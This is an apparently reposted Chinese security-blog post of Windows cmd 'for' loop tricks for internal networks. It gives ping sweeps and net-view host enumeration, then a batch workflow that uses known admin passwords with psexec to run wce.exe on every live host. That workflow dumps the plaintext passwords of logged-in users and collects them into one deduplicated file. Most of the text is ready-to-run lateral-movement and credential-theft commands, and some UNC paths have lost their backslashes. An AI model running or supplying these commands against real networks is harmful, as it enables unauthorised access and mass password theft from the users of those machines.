关于for命令在内网中的奇技淫巧。

admin 2022年2月25日01:42:39评论134 views字数 991阅读3分18秒阅读模式

c段存活主机查找

for /l %i in (1,1,255) do @ping 10.0.1.%i -w 1 -n 1 | find /i "ttl"

c段存活主机查找+主机名

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"

b段查找,在一个内网里面有时候不一定只有一个域,而当两个域没有信任时,可以用这条扫出来

for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

把net view的结果,挨个ping一遍,并输出机器名和ip地址。

FOR /F "eol=- tokens=1 delims= " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

当前环境:知道网内多个主机的默认密码(管理员),每台主机会有不同用户登录进来,现在想读取登录到主机其他用户的密码,但主机太多不想一个一个登录进去读密码的解决办法:

for /l %%i in (1,1,253) do echo 192.168.1.%%i >>ip.txt (按网段生成ip列表,现在的环境254为网关,所以地址到253止)
for /f %%i in (ip.txt) do ping -n 1 -w 10 %%i | find /i "ttl" >nul && echo %%i >>ok.txt (判断存活主机,同网段内一般是不禁ping的)
del ip.txt
for /f %%i in (ok.txt) do psexec \%%i -u 用户名 -p 密码 -c wce.exe -w -o %%i.txt && move /y \%%iadmin$system32%%i.txt .ip
(从存活的主机列表里逐个按已知帐号密码尝试远程执行命令,psexec -c参数是复制并执行wce.exe,执行完会自动删除wce.exe,-w读取明文帐号密码 -o保存到以ip命名的文件,然后将文件剪切到本地)
del ok.txt
cd ip
for %i in (*) do for /f %j in (%i) do echo %j >>ok.txt(将多个文件合并)
for /f %i in (ok.txt) do findstr "%i" "result.txt" >nul || echo %i >>result.txt(去重)


本文始发于微信公众号(关注安全技术):关于for命令在内网中的奇技淫巧。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月25日01:42:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于for命令在内网中的奇技淫巧。https://cn-sec.com/archives/503257.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息